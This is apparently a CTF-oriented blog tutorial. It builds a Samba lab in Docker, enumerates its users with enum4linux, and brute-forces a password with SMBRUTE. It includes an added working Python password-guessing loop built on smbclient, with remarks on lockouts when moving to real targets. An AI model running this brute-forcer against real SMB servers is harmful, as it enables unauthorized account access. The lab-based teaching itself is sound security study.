When doing CTF challenges we often come across servers with SMB ports listening, and when we enumerate them we find a user but no password. Then we have to do it the hard way and brute force Samba with SMBRUTE.
In this post I will do the following:
- Set up a Samba lab using Docker
- Enumerate the container for a user
- Brute force that user's password using SMBRUTE
For this I will be using my BlackArch install and Docker running on an Ubuntu system. You can follow along with my post on how to install Arch Linux with the BlackArch repos. However, any modern Linux system will do the trick.
| System | IP address |
|---|---|
| Enumeration system (BlackArch Linux) | 192.168.1.150 |
| Samba system (Alpine Docker container) | 192.168.1.195 |
Enumeration System Setup
To set up the enumeration system we need a couple of packages installed.
Install smbclient, cifs-utils and enum4linux
# Debian/Ubuntu
sudo apt-get install smbclient cifs-utils enum4linux
# Arch/BlackArch
sudo pacman -S smbclient cifs-utils enum4linux
smbclient provides the Samba client commands, cifs-utils is required so the enumeration system can mount SMB shares, and enum4linux wraps the Samba tools to enumerate shares, users and related details from SMB servers such as Samba.
Samba Server Setup
For the Samba server I am going to use Docker, so make sure Docker is installed and started on the Samba host.
sudo snap install docker
sudo systemctl enable --now docker
Create a working directory and cd into it.
mkdir -p ~/docker/samba
cd ~/docker/samba
Pull down the Docker image for Samba.
sudo docker pull pwntr/samba-alpine
Run the image. With --network host the container's ports 139 and 445 appear directly on the Docker host's IP (192.168.1.195 in this lab), and the local share/ directory is mounted into the container as the exported directory.
sudo docker run -d -it --network host --name samba -v $(pwd)/share/:/shared --rm pwntr/samba-alpine
Confirm the container is running
sudo docker ps
This Samba image has a user called rio and you have to set its Samba password. Open a shell in the container, then run smbpasswd and set the password to “letmein”.
sudo docker exec -it samba /bin/ash
smbpasswd -a rio
New SMB password:
Retype new SMB password:
Enumerate A Samba Server
Before we can brute force anything we need to enumerate some details such as shares and users. A great tool to start with is nmap.
Running nmap against the host quickly shows us that ports 139 and 445 are listening, which are the SMB ports. Using enum4linux we can enumerate even more. Let's get some information on what is shared.
enum4linux -S 192.168.1.195
Which produces the output,
Next we get the users that can be used.
enum4linux -U 192.168.1.195
The output of this gives us the user rio.
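The two enum4linux runs above leave you with text to read by eye; for the next step you need the usernames in a file. The following is an added example, not part of the original post or of enum4linux: it extracts usernames (from the rpcclient-style `user:[name] rid:[0x...]` lines enum4linux prints) and share names (from the smbclient share table) and writes the users file. The sample output embedded below is constructed to mimic abridged enum4linux output; only the user rio, the share data and the path /tmp/users.txt come from the post, everything else is assumed.

```python
"""Parse enum4linux -U / -S output into lists usable by a brute-force step.

Added example, not code from the post or from enum4linux. The regexes assume
the `user:[name] rid:[0x...]` line format (from rpcclient enumdomusers) and the
`Sharename  Type  Comment` table format that smbclient -L prints.
"""
import re
from typing import List

# user:[rio] rid:[0x3e8]
USER_RE = re.compile(r"^\s*user:\[(?P<name>[^\]]+)\]\s+rid:\[(?P<rid>0x[0-9a-fA-F]+)\]")
# \tdata            Disk      <comment>
SHARE_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>Disk|IPC|Printer)\b(?P<comment>.*)$")


def parse_users(text: str) -> List[str]:
    """Return the usernames found in enum4linux -U style output, in order."""
    users = []
    for line in text.splitlines():
        m = USER_RE.match(line)
        if m:
            users.append(m.group("name"))
    return users


def parse_shares(text: str, include_ipc: bool = False) -> List[str]:
    """Return share names from the smbclient -L table inside enum4linux -S
    output. IPC$ is not a data share, so it is dropped unless asked for."""
    shares = []
    for line in text.splitlines():
        m = SHARE_RE.match(line)
        if not m:
            continue
        if m.group("type") == "IPC" and not include_ipc:
            continue
        shares.append(m.group("name"))
    return shares


def write_list(path: str, items: List[str]) -> None:
    """Write one entry per line, the format a users/passwords file needs."""
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(items) + "\n")


# Constructed, abridged samples of enum4linux output (not real captures).
SAMPLE_USERS = """\
 ========================( Users on 192.168.1.195 )========================

user:[rio] rid:[0x3e8]
"""

SAMPLE_SHARES = """\
 ===================( Share Enumeration on 192.168.1.195 )===================

\tSharename       Type      Comment
\t---------       ----      -------
\tdata            Disk      
\tIPC$            IPC       IPC Service (Samba Server)
"""

if __name__ == "__main__":
    # In practice feed it the saved output: enum4linux -U 192.168.1.195 > users.out
    users = parse_users(SAMPLE_USERS)
    print("users:", users, "shares:", parse_shares(SAMPLE_SHARES))
    write_list("/tmp/users.txt", users)
```

Feed it the saved enum4linux output rather than the constructed sample, and check the users list by eye before brute forcing: enum4linux also prints group and built-in account names in other sections, and you do not want to spray a wordlist at accounts that are not targets.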
Now that we have a user “rio” and a share called “/data” we can move on to brute forcing the server password for the user “rio”.
What is SMBRUTE? It's a Python script that uses smbclient to guess the password of an SMB share when you have a username. It takes a file of usernames and a file of passwords and tries every password against every user. But first let's get the SMBRUTE Python scripts.
We can use git to clone the repository into a local folder. In this case I will put it into a directory called /root/scripts.
cd /root/scripts
git clone https://github.com/NullByte007/SMBRUTE
Once cloned you can cd into the newly created SMBRUTE directory and run the script to get some help on it.
cd SMBRUTE/
python ./SMBRUTE.py
The script needs a number of options to run:
- -u, a users file. This is a text file with all the users we want to try.
- -p, a password file. This is a text file with all the passwords that will be tried against every user.
- -t, the target: the IP or hostname of the SMB system.
I have created two text files. /tmp/users.txt contains the users we will try, in this case only the one user “rio”. /opt/wordlist/fastrack.txt is a password file with 222 of the most popular passwords; it can be grabbed from GitHub.
Let's give it a go.
python ./SMBRUTE.py \
  -u /tmp/users.txt \
  -p /opt/wordlist/fastrack.txt \
  -t 192.168.1.195
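To show what a script like SMBRUTE is doing underneath, here is the core of such a loop in Python. This is an added example, not SMBRUTE's own code: it shells out to smbclient (which the post says SMBRUTE also relies on), takes the same -u/-p/-t options, classifies each attempt from smbclient's exit code and the NT_STATUS text it prints, and stops on an account lockout or a connection error instead of burning through the whole wordlist. The smbclient invocation, the NT_STATUS strings and the lockout handling are assumptions about smbclient's behaviour, not something the post states; the rio/letmein credentials and the file paths in the usage note are the ones from this post.

```python
"""Minimal SMB password guessing loop in the style of SMBRUTE.

Added example, not the SMBRUTE project's code. Assumptions (not from the post):
  - `smbclient -L //target -U user%password` exits 0 on a valid logon;
  - a wrong password prints "NT_STATUS_LOGON_FAILURE" and exits non-zero;
  - a locked account prints "NT_STATUS_ACCOUNT_LOCKED_OUT".
"""
import argparse
import subprocess
from typing import Callable, Dict, Iterable, List, Tuple

LOGON_FAILURE = "NT_STATUS_LOGON_FAILURE"
LOCKED_OUT = "NT_STATUS_ACCOUNT_LOCKED_OUT"

# (user, password) -> (exit code, combined stdout+stderr). Injected so the loop
# can be exercised without a live server.
Attempt = Callable[[str, str], Tuple[int, str]]


def read_list(path: str) -> List[str]:
    """Read a users or passwords file, one entry per line, skipping blanks."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [line.rstrip("\r\n") for line in fh if line.strip()]


def classify(returncode: int, output: str) -> str:
    """Map one smbclient run to 'success', 'fail', 'lockout' or 'error'."""
    if LOCKED_OUT in output:
        return "lockout"
    if returncode == 0:
        return "success"
    if LOGON_FAILURE in output:
        return "fail"
    # Anything else (host unreachable, connection refused, timeout) is not a
    # wrong password, so the caller should stop rather than keep guessing.
    return "error"


def smbclient_attempt(target: str, user: str, password: str, timeout: int = 10) -> Tuple[int, str]:
    """One real guess: list the server's shares with the given credentials."""
    cmd = ["smbclient", "-L", f"//{target}", "-U", f"{user}%{password}"]
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return 1, "smbclient timed out"
    return proc.returncode, proc.stdout + proc.stderr


def brute_force(users: Iterable[str], passwords: Iterable[str], attempt: Attempt) -> Dict[str, str]:
    """Try every password for every user. A user stops at the first hit or at
    a lockout; a transport/config error aborts the whole run. Returns
    {user: password} for the accounts that were cracked."""
    passwords = list(passwords)
    found: Dict[str, str] = {}
    for user in users:
        for password in passwords:
            rc, out = attempt(user, password)
            verdict = classify(rc, out)
            if verdict == "success":
                found[user] = password
                break
            if verdict == "lockout":
                # Further guesses against this account are wasted and noisy.
                print(f"[!] {user}: account locked out, moving on")
                break
            if verdict == "error":
                raise RuntimeError(f"smbclient error for {user}: {out.strip()}")
    return found


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="SMB password guessing via smbclient")
    ap.add_argument("-u", "--users", required=True, help="file with one username per line")
    ap.add_argument("-p", "--passwords", required=True, help="file with one password per line")
    ap.add_argument("-t", "--target", required=True, help="IP or hostname of the SMB server")
    args = ap.parse_args()
    hits = brute_force(read_list(args.users), read_list(args.passwords),
                       lambda u, p: smbclient_attempt(args.target, u, p))
    for user, password in hits.items():
        print(f"[+] {user}:{password}")
    if not hits:
        print("[-] no valid credentials found")
```

Against the lab above you would run it as `python smb_guess.py -u /tmp/users.txt -p /opt/wordlist/fastrack.txt -t 192.168.1.195` and expect `[+] rio:letmein`. The lockout verdict is the check worth keeping when you move from a CTF box to a real target: a Samba server with an account lockout policy will lock the account after a handful of wrong guesses, after which every further attempt is wasted and every one of them is logged.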
I have posted the basics of this to YouTube so you can get a more visual experience of what's involved.
I hope you found this write-up of some use. When doing CTF challenges I found that Samba is something that pops up quite often, and it is well worth memorizing the tools required to enumerate it. So learn to brute force Samba with SMBRUTE.
Any questions or comments, leave them below.